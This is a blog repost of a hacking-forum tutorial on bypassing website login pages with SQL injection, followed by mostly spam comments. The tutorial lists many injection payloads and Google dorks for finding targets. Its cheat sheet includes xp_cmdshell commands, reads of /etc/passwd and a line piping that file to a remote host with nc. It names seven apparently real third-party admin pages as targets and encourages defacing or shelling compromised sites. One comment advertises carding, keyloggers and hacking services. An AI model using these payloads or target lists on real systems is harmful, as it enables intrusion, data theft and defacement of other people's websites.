#Chapter2: Basic SQL injection with Login Queries#


Tutorial 100% Made by Zer0Freak

Bypassing Login pages on websites using SQL injectable queries


Level: Beginners and Intermediate
Requirements: Patience and stradegy
Alright in this tutorial, we'll be learning how to bypass login pages with the help of MySequel injection using Login Queries.
This is Chapter 2 of the MegaProject.
Please visit Chapter 1 if you haven't seen it yet
Also, if you need some questions answered, you can find solutions on my FAQ Thread: http://www.hackforums.net/showthread.php?tid=1993481

What is SQL injection?
Answer: Basically, it's a process where you execute a certain query in a website in order to extract information such as log-in information, users etc. for either personal gain or random use from the website's database.
There are many type of certain queries that can be executed in order to illegally extract information from the website's database.
In this tutorial the query we'll be using is Basic SQL injection query where it can be executed in a login page.
Example:
Code:
Username: admin
Password: ‘ or ‘1’=’1
When you enter the password "‘or ‘1’=’1" in most website, there's a chance you can gain access.
How does it happen? Look at the code when we execute that query
PHP Code:
SELECT FROM users
WHERE username 
‘admin’AND password ‘ ‘ or ‘1’=’1’ 
In the password field, we inserted a quote ' first, then a bunch of random characters like "1".
The database always scans for rows and hence in the query we have executed, there's only 1 row which states that there's no reason for the login to be incorrect.
However, some websites can filter out these type of queries, so it's best to use different ones too. You can find some below
Now that you have an idea of how Basic SQL injection queries work, lets try and put it to use shall we

Step1: Finding websites with Login Pages
Alright, out basic approach is to find a couple of websites with login pages so that we can execute our query in order to bypass it.
For this, we can use dorks.
If you don't know how to use dorks or have no idea about it, please visit my previous tutorial: http://www.hackforums.net/showthread.php?tid=2059771
In this tutorial, we can use these dorks:
Code:
inurl:/login.php
inurl:/admin.php
inurl:/admin
inurl:/login.html
If you want to find more dorks when using this method, you can find them here:
Code:
http://pastebin.com/ZjxpivV3

Step2: Now Executing the query
Alright, now that you've found your target with a log in page, lets play with it a bit.
So here's what you're gonna do
Username will be admin, cause most sites are having admin data stored in their databases
Code:
Username: admin
Password: ' or 0=0 --
Didn't work? No worries, there's more to that than just a single query
Here's a list of queried passwords you can use to hopefully inject the site.
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
Credits to RealSteal for some of the codes mentioned above.
Note: Sometimes, this is not the best way of hacking websites with SQL injection but I guarantee, you'll be a successful patient SQL injector and get used to this method.

Step3: I LOGGED in, what to do now?!
Well, first off, if you did login, then congratz on your first successful attempt of SQL injection.
So, there are basically many things you can do with the site.
Most people would love to deface it
Others will just shell it and have other uses such as rooting, webhosting etc.
If would like to deface the website, locate the homepage and replace it with your deface page.
A tutorial of mine on how to deface a page will be coming soon Now you might wanna watch the video so that you'll get the idea of how I login as an Administrator on a SQLi vulnerable website





Extras:
Common Password Queries:
Code:
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

If version of Database is greater than 5, then queries with UNION,group, @@version,orderby,benchmark etc can be executed
Code:
1234' AND 1=0 UNION ALL SELECT 'admin'
' HAVING 1=1 --
' GROUP BY table.columnfromerror1 HAVING 1=1 --
@@version
select @@version
select @@servername
select @@microsoftversion
select * from master..sysservers
select * from sysusers
exec master..xp_cmdshell 'ipconfig+/all'
exec master..xp_cmdshell 'net+view'
exec master..xp_cmdshell 'net+users'
SELECT 1 -- comment
SELECT /*comment*/1
ORDER BY 1--
' union all select sum(columntofind) from users--
UNION ALL SELECT null
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
SELECT TOP n columns
select * from OPENROWSET('MSDASQL'
select * from OPENROWSET('SQLOLEDB'
masters..sysxlogins
sys.sql_logins
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT CHAR(0x66)
SELECT * FROM members
@@version
SELECT USER();
select host
SELECT 1;
SELECT /*comment*/1;
ORDER BY 1--
UNION ALL SELECT null
SELECT schema_name FROM information_schema.schemata;
SELECT table_schema
SELECT grantee
limit 1
SELECT host
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(100
select benchmark( 500
SELECT CHAR(75)+CHAR(76)+CHAR(77)
SELECT ascii('A')
SELECT CONCAT('0x'
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT /*!32302 1/0
SELECT 0x5045
SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);
SELECT IF(1=1
' UNION ALL SELECT LOAD_FILE('/etc/passwd') AND 'a'='a
union SELECT LOAD_FILE(0x2f6574632f706173737764)
load data infile 'c:/boot.ini' into table foo;
# SELECT ... INTO DUMPFILE
SELECT login || '-' || password FROM members
select versionnumber
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
select * from syscat.tabauth;
select current server from sysibm.sysdummy1;
select * from syscat.dbauth where grantee = current user;
select * from syscat.tdbauth where grantee = current user;
select name from sysibm.systables;
select name
SELECT schemaname FROM syscat.schemata;
SELECT foo FROM bar fetch first 1 rows only;
select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;
SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1;
SELECT cast(’123' as integer) FROM sysibm.sysdummy1;
select version();
select current_database();
"select current_user;
select session_user;
"SELECT current_setting('data_directory');
select current_setting(’log_connections’);
select current_setting(’log_statement’);
"select current_setting(’port’);
select current_setting(’password_encryption’);
select current_setting(’krb_server_keyfile’);
"select current_setting(’virtual_host’);
select current_setting(’port’);
"select current_setting(’config_file’);
"select current_setting(’hba_file’);
"select current_setting(’data_directory’);
LIMIT n
SELECT pg_sleep(10);
SELECT current_database()
SELECT relname
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r'
SELECT DISTINCT relname FROM pg_class C
SELECT 1; --comment
SELECT /*comment*/1;
SELECT chr(65);
SELECT ascii('A');
SELECT CHR(65)||CHR(66);
SELECT usename
SELECT usename FROM pg_user WHERE usesuper IS TRUE
SELECT system('cat /etc/passwd | nc 10.0.0.1 8080');
SELECT 'A' || 'B';
SELECT CAST(1 as varchar);
SELECT CAST('1' as int);
SELECT * FROM dblink('host=put.your.hostname.here user=someuser  dbname=somedb'
select dbmsinfo(’_version’);
select dbmsinfo(’session_user’);
select dbmsinfo(’system_user’);
select dbmsinfo(’database’);
select dbmsinfo(’db_admin’);
select dbmsinfo(’create_table’);
select dbmsinfo(’create_procedure’);
select dbmsinfo(’security_priv’);
select dbmsinfo(’select_syscat’);
select dbmsinfo(’db_privileges’);
select dbmsinfo(’current_priv_mask’);
select top 10 blah from table;
select first 10 blah form table;
select table_name
select relid
select relid
select column_name
select 1 union select 2;
select cast(’123' as integer);
select @@version"
select name from master..syslogins"
select name from master..sysdatabases"
convert(integer
waitfor delay '0:0:5'

Database Version lower than 5 i.e Version 4 cannot accept UNION version 5 type queries.
Looking for a test or challenge?
Try Stewie's hack test: http://www.stewie390.info/hack_tests/lvl5/homepage.php
Here are some sites you can test on:
Code:
http://www.amskrupajal.org/AdminLogin.asp
http://www.csimatrichss.org/adminpage.asp
http://www.preventivecardiology.in/adminlogin.asp
http://pndllc.com/pndllc/admin/adminlogin.asp
http://www.singleusemedical.com/admin/adminLogin.asp
http://www.ringjordan.com/admin.asp
http://sunmarytrust.org/adminlogin.asp
I tried injecting all of them and it worked, so it should work for you too
Good luck

End of Chapter 2
Upcoming Chapter 3:
Union Based/Normal SQL injection

Penulis : ZentrixPlus ~ Sebuah blog yang menyediakan berbagai macam informasi

Artikel #Chapter2: Basic SQL injection with Login Queries# ini dipublish oleh ZentrixPlus pada hari Tuesday, January 17, 2012. Semoga artikel ini dapat bermanfaat.Terimakasih atas kunjungan Anda silahkan tinggalkan komentar.sudah ada 118 komentar: di postingan #Chapter2: Basic SQL injection with Login Queries#
 

118 comments:

  1. View the Net Worth of Celebrities, Athletes, Rappers and other Famous Movie Stars. World's Most Comprehensive Celebrity Net Worth Encyclopedia
    celebrity net worth
    celebrities net worth

    ReplyDelete
    Replies



    1. Hello all
      am looking few years that some guys comes into the market
      they called themselves hacker, carder or spammer they rip the
      peoples with different ways and it’s a badly impact to real hacker
      now situation is that peoples doesn’t believe that real hackers and carder scammer exists.
      Anyone want to make deal with me any type am available but first
      I‘ll show the proof that am real then make a deal like

      Available Services

      ..Wire Bank Transfer all over the world

      ..Western Union Transfer all over the world

      ..Credit Cards (USA, UK, AUS, CAN, NZ)

      ..School Grade upgrade / remove Records

      ..Spamming Tool

      ..keyloggers / rats

      ..Social Media recovery

      .. Teaching Hacking / spamming / carding (1/2 hours course)

      discount for re-seller

      Contact: 24/7

      fixitrogers@gmail.com



      Delete
    2. Chapter2: Basic Sql Injection With Login Queries >>>>> Download Now

      >>>>> Download Full

      Chapter2: Basic Sql Injection With Login Queries >>>>> Download LINK

      >>>>> Download Now

      Chapter2: Basic Sql Injection With Login Queries >>>>> Download Full

      >>>>> Download LINK cc

      Delete
  2. photo tagging code with demo
    http://www.lessonwithdemo.com/205/ajax/photo-tagging-like-facebook-without-page-refresh-with-ajax-without-jquery.php/

    ReplyDelete
  3. this was great help! thank you! +1

    ReplyDelete
  4. That's really a great article. Thanks for sharing with us. Keep Posting.

    With Regards,
    http://www.marketingempire.co.uk

    ReplyDelete
  5. can you tell me wich one to use for http://www.huppy.net/admin/admin.php

    ReplyDelete
  6. Hello, just wanted to say, I loved this article. It was practical.
    Keep on posting!
    Signature:
    facebook iniciar sesion gratis - Sitio Oficial iniciado sesión en Facebook lengua española. facebook inicio sesion entrar rápido, facebook iniciar sesion en tu cuenta de entrar facebook

    ReplyDelete
  7. I am happy to find this post very useful for me
    Signature:
    download baixar facebook movel, Facebook movel, baixar facebook. Facebook chat, baixar whatsapp, fazer o download baixar whatsapp gratis para Android, iPhone. Últimas Facebook

    ReplyDelete
  8. Thanks for sharing this quality information with us. I really enjoyed reading.
    Signature:
    The place to play all unblocked games 77 online. Here you can find every blocked games such as: unblockedgames , unblocked games happy , unblocked games 77 ,

    ReplyDelete
  9. Most amazing Blog ! Thank you so much for sharing this one really well defined all peaceful info,well really like it,Keep it up - SQL Lite Database Integration Service

    ReplyDelete
  10. . Firstly thanks a lot for such a wonderful post. I would like to know more about such topics and hope to get some more helpful information from your blog.
    Thankss ..
    www.multicrafthosting.com

    ReplyDelete
  11. It is an amazing post.Very useful to me.I liked it .Take a look to my blog Professional Dot Net Training in Chennai

    ReplyDelete
  12. Your blog provided us with valuable information to work with. Thanks a lot for sharing. Keep blogging.

    Shop Online Equinox Nebulizer

    ReplyDelete
  13. Thank you for taking the time to publish this information very useful! I've been looking for books of this nature for a way too long. I'm just glad that I found yours. Looking forward for your next post. Thanks :)

    shop online equinox nebulizer

    ReplyDelete
  14. Here they worked ingeniously with data provided by institutions, partner hiring companies, recruitment firms and job boards.
    Top mba college in bangalore | Top b schools in bangalore | PGDM Placements In Bangalore


    ReplyDelete
  15. YOu can chack my best sqli tut on my blog.. :D
    just click here... :P
    >>>>> http://tinyurl.com/basicsqli

    ReplyDelete
  16. YOu can chack my best sqli tut on my blog.. :D
    just click here... :P
    >>>>> http://tinyurl.com/basicsqli

    ReplyDelete
  17. Hi nice blog .. really good and enjoyed. It's a treasure for me to reading your blog..Thank you for this article. Good Stuff!I really enjoyed reading. I will be visiting often and telling my friends about this Hope to read more good articles. executive resume writing

    ReplyDelete
  18. Collections from the design labels such as pas cher trx and other beauty are released after every six months.
    With every new launch, a new penny skateboards cheap online technology is developed.
    This had led to making TRX For Sale remain competitive in the International market.
    The entire pas cher trx packaging process is paid into detail to enhance the collections quality and appearance.
    Now everyone can own high-end designer trx france.
    TRX Suspension Training Sale being one of the largest and most prominent fashion company in the world, it has an obligation of beating the standards set by others.
    The fashion world, with a higher concentration on Discount TRX Sale, needs to provide the best packaging services that the modern world has ever seen.
    TRX Suspension Training On Sale plays a major role in creating a brand name that fashion lovers want to identify with.

    ReplyDelete
  19. Collections from the design labels such as Cheap TRX and other beauty are released after every six months.
    With every new launch, a new trx pas cher technology is developed.
    This had led to making trx pas cher remain competitive in the International market.
    The entire penny board hot sale packaging process is paid into detail to enhance the collections quality and appearance.
    Now everyone can own high-end designer Cheap TRX For Sale.
    cheap trx being one of the largest and most prominent fashion company in the world, it has an obligation of beating the standards set by others.
    The fashion world, with a higher concentration on trx france, needs to provide the best packaging services that the modern world has ever seen.
    cheap trx plays a major role in creating a brand name that fashion lovers want to identify with.

    ReplyDelete
  20. “The indispensable first step to getting the things you want out of life is this: decide what you want.” http://goatripsindia.com/goa-new-year-packages

    ReplyDelete

  21. I must say This is the blog where essence is more than others yatiken IT Company

    ReplyDelete
  22. آبنما
    محصولات آبنما
    طراحی آبنما
    نکات مهم در خرید آبنما
    10 آبنما و فواره
    آبنما در مناظر
    انجام پایان نامه
    هدایای تبلیغاتی
    خودکار تبلیغاتی کراس
    خودکار تبلیغاتی شیفر
    لیوان و فلاسک تبلیغاتی
    خودکار تبلیغاتی فلزی
    خودکار تبلیغاتی پلاستیکی
    صنایع دستی تبلیغاتی اصفهان
    دفترچه یادداشت تبلیغاتی
    هدایای تبلیغاتی ویژه بانوان
    ماشین حساب تبلیغاتی
    کیف پول تبلیغاتی
    کیف سمیناری تبلیغاتی
    الکترونیکی تبلیغاتی
    ساعت دیواری تبلیغاتی
    ست رومیزی تبلیغاتی
    فلش تبلیغاتی
    پاور بانک تبلیغاتی
    جاکارتی تبلیغاتی
    خودکار تبلیغاتی پیرگاردین
    خودکار تبلیغاتی المپیا
    فلش تبلیغاتی hp
    ست مدیریتی تبلیغاتی
    فلش تبلیغاتی
    جاکلیدی تبلیغاتی فلزی چرمی
    جاکلیدی تبلیغاتی فلزی
    ساعت رومیزی تبلیغاتی
    ابزارآلات تبلیغاتی
    قلم های کلکسیونی
    خودکار تبلیغاتی ملودی
    خودکار تبلیغاتی یوروپن
    تالار
    تالار پذیرایی دانیال
    تالار پذیرایی دانیال
    تالار پذیرایی پارسیان
    تالار تیراژه با داشتن
    تالار پذیرایی سپیده
    تالار پذیرایی عطر سیب
    تالار قصر گلستان
    تالار پذیرایی نیاوران
    تالار پذیرایی پارس لوکس
    تالار تشریفاتی داریوش
    تالار پذیرایی استقلال
    تالار پذیرایی صدف
    تالار پذیرایی حجله
    تالار اریکه پارسیان
    تالار پذیرایی سفیر

    ReplyDelete
  23. تالار قصر امپراطور غرب
    تالار پذیرایی بین المللی آناهیتا
    تالار پذیرایی مهرگان
    تالار تشریفاتی قصر بهشت
    تالار تشریفاتی آریا
    تالار شادیهای زندگی
    تالار پذیرایی صاحبقرانیه
    تالار پذیرایی امیران
    تالار قصر آیلین
    تعمیر صندلی اروند
    تعمیر صندلی رادسیستم
    تعمیر صندلی رایانه صنعت
    تعمیر صندلی راحتیران
    تعمیر صندلی نیلپر
    تعمیر مبل
    تعویض قطعات صندلی
    تعمیر صندلی در محل
    درب ضد صدا
    درب آکوستیک
    تعمیر صندلی کامپیوتر
    تعمیر صندلی گردان
    تعمیر صندلی اداری
    جک صندلی
    دسته صندلی
    مکانیزم صندلی
    پایه صندلی
    چرخ صندلی
    تعمیر انواع صندلی
    تور استانبول
    تور ارمنستان
    تور تایلند
    تور دبی
    تور آنتالیا
    تور کیش
    تور مشهد
    تور کربلا
    تور قبرس شمالی
    تور قشم
    ویزای شینگن
    تور مسکو
    تور گرجستان
    راهنمای خرید میز ناهارخوری
    درست نشستن در پشت میز کامپیوتر
    میـز فـلـــزی تـکی
    صندلی چوبی تکی
    میز ناهارخوری ABS
    میز ناهار خوری فلزی
    میز ناهار خوری چوبی
    میز ناهار خوری
    میز کامپیوتر
    پالت پلاستیکی
    انواع پالت پلاستیکی

    ReplyDelete
  24. فروش آمونیوم سولفات
    سولفات آمونیوم ازبکستان
    سولفات آمونیوم ارومیه
    کود سولفات آمونیوم
    فروش کربنات سدیم
    فروش اسید کربنیک
    کربنات کلسیم رسوبی
    کربنات کلسیم خوراکی
    فروش کربنات کلسیم رسوبی
    فروش کربنات کلسیم خوراکی
    فروش کلسیم کربنات
    قیمت سود پرک
    فروش سود سوز آور
    فروش سود پرک
    فروش کاستیک سودا
    قیمت سود سوز آور
    فروش سود سوزآور
    سود پرک چیست
    تولید کننده سود پرک
    فروش جوش شیرین
    فروش جوش شیرین شیراز
    فروش جوش شیرین چینی
    فروش جوش شیرین اصفهان
    فروش جوش شیرین ایرانی
    فروش جوش شیرین تهران
    خرید جوش شیرین
    خرید و فروش جوش شیرین
    خرید جوش شیرین شیراز
    خريد جوش شيرين
    جوش شیرین چیست
    فروش آب مقطر
    آب دیونیزه
    سود سوز آور مایع
    فروش سود مایع
    فروش سود سوز آور مایع
    قیمت سود مایع
    سود مایع 50 درصد
    فروش سود مایع در اصفهان
    سود مایع چیست
    خرید سود مایع
    تولید سود مایع
    خریدار سود مایع
    تولید کنندگان سود مایع
    سود مایع 50
    حمل سود مایع
    فروش سود سوزآور مایع
    فروش پرمنگنات
    پرمنگنات پتاسیم
    فروش پرمنگنات پتاسیم
    قیمت پرمنگنات پتاسیم
    قیمت پرمنگنات
    فروش آب ژاول

    ReplyDelete
  25. فروش وایتکس
    کود مرغی پلت شده
    فروش کود مرغی
    فروش کود مرغ
    فروش کود مرغی پلت شده
    فروش کود مرغی پلیت
    فروش کود مرغی پلیت شده
    کود مرغی پلیت
    کود مرغی پلیت شده
    کود مرغی مایع
    فروش کود مرغی فله
    فروش کود مرغی در اصفهان
    فروش کود مرغی مایع
    فروش کود گاوی
    کود گاوی یا گوسفندی
    کود گاوی پوسیده
    کود گاوی تازه
    کود گاوی شسته شده
    کود گاوی شسته
    کود گاوی و گوسفندی
    کود گاوی در مشهد
    فروش کود گاوی پوسیده
    فروش کود گاوی اصفهان
    فروش کود گاوی در مشهد
    فروش کود گاوی شسته شده
    فروش کود گاوی ارزان
    فروش کود گاوی در اصفهان
    فروش کود گاوی در کرج
    قیمت فروش کود گاوی
    فروش کود گاوی شسته
    فروش کود گاوی در تهران
    تعمیرات موبایل
    راهنمای تعمیر موبایل‌های HTC
    راهنمای تعمیر موبایل‌های Apple iPhone
    راهنمای تعمیر موبایل‌های Sony
    راهنمای تعمیر موبایل‌های LG
    راهنمای تعمیر موبایل‌های Samsung
    راهنمای تعمیر موبایل‌های Huawei
    عینک آفتابی
    عینک سرتینا کودکان certina kids
    عینک سرتینا certina
    عینک اسکادا ESCADA
    عینک دیزل DIESEL
    عینک پرادا
    عینک تگ اور
    عینک لویی ویتون
    عینک شنل
    عینک بولگاری
    عینک شوپارد
    عینک دسکوارد
    عینک آفتابی آنا هکمن
    عینک تام فورد

    ReplyDelete
  26. عینک گس
    عینک مون بلان
    عینک دلچ گابانا
    عینک پرسول
    عینک فیوروچی
    عینک روبرتو کاوالی
    عینک سوارووسکی
    عینک بیبلاس
    عینک روو
    عینک تروساردی
    عینک پلیس
    عینک ریبن
    عینک سرتینا کودکان
    عینک آفتابی پولاروید
    عینک آفتابی برند
    برند های عینک آفتابی
    انواع برند عینک آفتابی
    محصولات عینک آفتابی
    تعمیر تردمیل
    شناخت اجزا تردمیل
    توصيه هايي براي كاهش وزن
    آموزش تعمیر و عیب یایی تردمیل
    دانلود مقاله
    جزوه حقوق معاهدات
    جزوه کیفرشناسی
    جزوه حقوق ثبت اسناد
    دانلود جزوه تاریخ تحول ح.ب
    جلوگیری از بزهکاری نوجوانان
    دانلود مقاله پیشگیری از جرم
    دانلود جزوه مکاتب کیفری
    دانلود مقاله حقوق عرفی
    دانلود مقاله ملاقات طفل و حضانت
    دانلود مقاله اصل صحت
    دانلود مقاله حکم تخلیه
    دانلود مقاله مجازات تجاوز جنسی
    دانلود مقاله پولشویی
    دانلود مقاله دلایل تکرار جرم
    دانلود مقاله جزای نقدی
    دانلود مقاله محرومیت از حقوق اجتماعی
    دانلود مقاله میانجیگری کیفری
    دانلود مقاله حبس در منزل
    دانلود مقاله غصب
    دانلود مقاله وقف
    دانلود مقاله مالکیت فکری
    دانلود مقاله جرائم کامپیوتری
    دانلود مقاله مالکیت فکری
    دانلود مقاله مالکیت فکری
    دانلود مقاله بررسی مجازات زندان
    دانلود مقاله آزادی بیان
    دانلود مقاله حقوق ملت
    دانلود مقاله انواع جرائم کامپیوتری
    دانلود مقاله یونیسف

    ReplyDelete
  27. تعمیر درب اتوماتیک
    تعمیر درب اتوماتیک BFT
    تعمیر درب اتوماتیک Beninca
    تعمیر درب اتوماتیک Utab
    تعمیر درب اتوماتیک Nice
    تعمیر درب اتوماتیک Proteco
    تعمیر درب اتوماتیک Faac
    تعمیر درب اتوماتیک Sommer
    تعمیر درب اتوماتیک Fadini
    تعمیر درب اتوماتیک Beta
    تعمیر درب اتوماتیک Life
    تعمیر درب اتوماتیک V2
    تعمیر کرکره برقی
    تعمیر کرکره برقی مغازه
    تعمیر کرکره برقی پارکینگ
    تعمیر کرکره برقی شیشه ای
    تعمیر آیفون تصویری
    تعمیر آیفون تصویری کوماکس
    تعمیر آیفون تصویری تکنما
    تعمیر آیفون تصویری تابا
    تعمیر آیفون تصویری سیماران
    تعمیر آیفون تصویری الکتروپیک
    تعمیر آیفون تصویری سامسونگ
    تعمیر جک پارکینگ
    تعمیر جک پارکینگ یوروتک
    تعمیر جک پارکینگ پروتکو
    تعمیر جک پارکینگ زومر
    تعمیر جک پارکینگ بنیکا
    تعمیر جک پارکینگ فادینی
    تعمیر جک پارکینگ V2
    تعمیر مبل
    مراحل تعمیر مبل
    دوربین مدار بسته
    دوربین تحت شبکه
    دوربین مدار بسته FW1179WM1s
    دوربین مدار بسته FW7901-TVV
    دوربین مدار بستهFW7300
    دوربین مدار بستهFW7502
    دوربین مدار بستهFW7500
    دوربین مدار بستهFW7501
    دوربین مدار بستهFW7502
    دوربین مدار بستهFW7501
    دوربین مدار بستهFW7902
    سنگ آنتیک
    سنگ مصنوعی quick stack silver
    سنگ مصنوعی Antique silver
    سنگ مصنوعی dry stack silver
    سنگ مصنوعی ledge stack silver
    سنگ مصنوعی elegance silver
    سنگ مصنوعی
    سنگ مصنوعی Random
    تمیز کردن سنگ آنتیک

    ReplyDelete
  28. نصب سنگ مصنوعی به وسیله چسب خمیری
    مزایای سنگ مصنوعی سمنت پلاست
    کاربرد سنگ مصنوعی سمنت پلاست
    ساخت شومینه با استفاده از سنگ مصنوعی
    ویژگی سنگ مصنوعی
    پرسش های متداول در زمینه سنگ مصنوعی
    ماده ضد شوره در سنگ مصنوعی
    استفاده از سنگ مصنوعی در راه پله
    دلایل کاربرد ضایعات سنگ تراورتن
    شرایط استفاده از ضایعات تراورتن
    کجا از سنگ مصنوعی استفاده نکنیم
    تعاریف مختلف سنگ مصنوعی
    همه چیز در مورد سنگ آنتیک
    دکوراسیون داخلی
    طراحی دکوراسیون داخلی مسکونی
    طراحی دکوراسیون ویلا
    طراحی دکوراسیون منزل
    طراحی دکوراسیون داخلی تجاری
    طراحی دکوراسیون اتاق خواب
    طراحی دکوراسیون داخلی هتل
    ابزارآلات تبلیغاتی
    آفتاب گیر تبلیغاتی
    جاکلیدی تبلیغاتی
    لیوان و فلاسک تبلیغاتی
    پاور بانک تبلیغاتی
    کیف پول و پاسپورتی تبلیغاتی
    هدایای تبلیغاتی ویژه بانوان
    فلش تبلیغاتی
    خودکار تبلیغاتی فلزی
    کتب نفیس
    قلم کراس
    ست مدیریتی تبلیغاتی
    بج سینه
    ساعت رومیزی تبلیغاتی
    صنایع دستی اصفهان
    جاکلیدی تبلیغاتی چرمی
    ساک دستی تبلیغاتی
    ست چرمی تبلیغاتی
    خودکار تبلیغاتی پلاستیکی
    آهک
    سود پرک
    آهک
    سود پرک
    آهک
    سود پرک
    آهک
    سود پرک
    آهک
    سود پرک
    آهک
    سود پرک
    آهک

    ReplyDelete
  29. خرید آپارتمان در خیابان پیروزی تهران
    تدریس خصوصی
    ایران به لیمو
    به لیمو
    استویا
    گیاه استویا
    آویشن باغی
    فیسالیس
    شرایط کاشت برداشت استویا
    دمنوش به لیمو و کاهش استرس
    عسل و به لیمو
    به لیمو و شربت به لیمو
    چند خواص مفید استویا
    بدن خود را با دمنوش استویا بیمه کنید
    سنگسابی سنگ های طبیعی
    کفسابی کاشی
    کفسابی سرامیک
    نماشویی ادارات
    کفسابی موزاییک
    کفسابی مرمر و گرانیت
    نماشویی با واشر فشار
    کفسابی آشپزخانه
    دستگاه کفسابی GM70BT
    خدمات کفسابی
    سنگسابی انواع سنگ
    نماشویی برج
    کفسابی درجه یک
    کاربرد کفسابی
    کفشویی یا فرچه ساب
    مزایای کفسابی
    کفسابی ساختمان تازه ساخت
    کفسابی در نزدیک زمان عید
    نکات کلیدی در مورد کفسابی
    کفسابی در تهران
    خرید عینک آفتابی
    عینک آفتابی مردانه
    عینک آفتابی زنانه
    عینک آفتابی اصل
    فروشگاه عینک آفتابی
    قیمت عینک ریبن اصل
    عینک آفتابی اورجینال
    مدل عینک آفتابی
    قیمت عینک آفتابی
    خرید اینترنتی عینک آفتابی
    خرید عینک آفتابی اورجینال
    فروشگاه عینک آفتابی اصل
    خرید عینک آفتابی مردانه
    خرید عینک آفتابی اصل
    فروشگاه اینترنتی عینک آفتابی
    عینک آفتابی دخترانه
    بهترین عینک آفتابی

    ReplyDelete
  30. christmas lovely quotes new year 2017 pics christmas greeting hd images christmas poems for friends new year famous hd images new year hd greeting cards christmas images, happy christmas images, christmas images free, christmas images for free to decorate their laptop and PC screen on the event of Christmas. You can also use the HD images for your mobiles; you can set as a wallpaper and sent a message to your friends in the event of Christmas.

    ReplyDelete
  31. As the generation advanced technologies also will increase for purchasers.ivr has no of advantages like, If callers don't realize the data they have or need more help, the calls area unit typically transferred to an agent. ivr also will log decision detail data into its own information for auditing, performance report, and future IVR system enhancements conjointly . ivr systemsarea unit utilized by medical firms and contract analysis organizations to conduct clinical trials and manage the massive volumes of knowledge generated.

    ReplyDelete
  32. The IVR System allows the caller to communicate through the phone system which is connected to the computer system to make a transaction or to get information from the company.ivr technology is the way of information exchanging with no need of any other company employee to assist

    ReplyDelete
  33. any one tell me the sql injected site

    ReplyDelete
  34. Thanks for sharing the post.lots of people will get benefits from this article
    corian
    corian price lict
    corian stone
    corian price

    ReplyDelete
  35. Just desire to say your article is as amazing. The clarity on your put up is just spectacular and i can assume you are a professional in this subject
    corian price list
    samsung corian
    Ir corian price
    corian surface
    LG corian
    Hanex corian

    ReplyDelete

  36. Very nice post.really I apperciate your blog.Thanks for sharing.keep sharing more blogs.

    ดูหนัง

    ReplyDelete
  37. This comment has been removed by the author.

    ReplyDelete
  38. قیمت انواع دوربین
    قیمت انواع دوربین دیجیتال
    قیمت انواع دوربین عکاسی
    قیمت انواع دوربین فیلمبرداری
    قیمت بهترین دوربین عکاسی حرفه ای
    قیمت دوربین gopro
    قیمت دوربین پاناسونیک
    قیمت دوربین
    قیمت دوربین حرفه ای
    قیمت دوربین حرفه ای عکاسی
    قیمت دوربین حرفه ای کانن
    قیمت دوربین حرفه ای کنون
    قیمت دوربین حرفه ای نیکون
    قیمت دوربین دیجیتال
    قیمت دوربین دیجیتال سونی
    قیمت دوربین دیجیتال کانن
    قیمت دوربین دیجیتال کنون
    قیمت دوربین عکاسی حرفه ای
    قیمت دوربین عکاسی حرفه ای کانن
    قیمت دوربین عکاسی دیجیتال
    قیمت دوربین عکاسی سونی
    قیمت دوربین عکاسی کانن
    قیمت دوربین عکاسی کانن حرفه ای
    قیمت دوربین عکاسی کانون
    قیمت دوربین عکاسی کنون
    قیمت دوربین عکاسی نیکون
    قیمت دوربین عکاسی و فیلمبرداری
    قیمت دوربین فیلمبرداری حرفه ای
    قیمت دوربین فیلمبرداری سونی
    قیمت دوربین فیلمبرداری کانن
    قیمت دوربین های حرفه ای
    قیمت دوربین های حرفه ای عکاسی
    قیمت دوربین های دیجیتال
    قیمت دوربین های سونی
    قیمت دوربین های عکاسی
    قیمت دوربین های عکاسی حرفه ای
    قیمت دوربین های عکاسی کانن
    قیمت دوربین های فیلمبرداری
    قیمت دوربین های کانن
    قیمت دوربین های کنون
    قیمت دوربین های نیکون
    قیمت دوربینهای کانن
    قیمت دوربینهای کنون

    ReplyDelete
  39. Good stuffs from the article, summarizing the most important points. Found a great information from your post. For the same for your reference please visit pgdme business college in chennai | pgdm courses in chennai

    ReplyDelete
  40. This comment has been removed by the author.

    ReplyDelete


  41. برای درج آگهی نیاز به سرمایه گذاری نیست. تنها کافیست به طور رایگان در سامانه ی
    درج آگهی رایگان اینترنتی
    درج آگهی رایگان اینترنتی
    کافه نیاز ثبت نام کنید و هر گونه آگهی از خدمات تا ارائه ی کالا و خرید و فروش املاک و خودرو را در این سامانه ثبت نمایید.
    https://kafeniaz.com



    تجهیزمد شرکتی فعال در حوزه ی
    تجهیزات پزشکی در شیراز
    تجهیزات پزشکی در شیراز
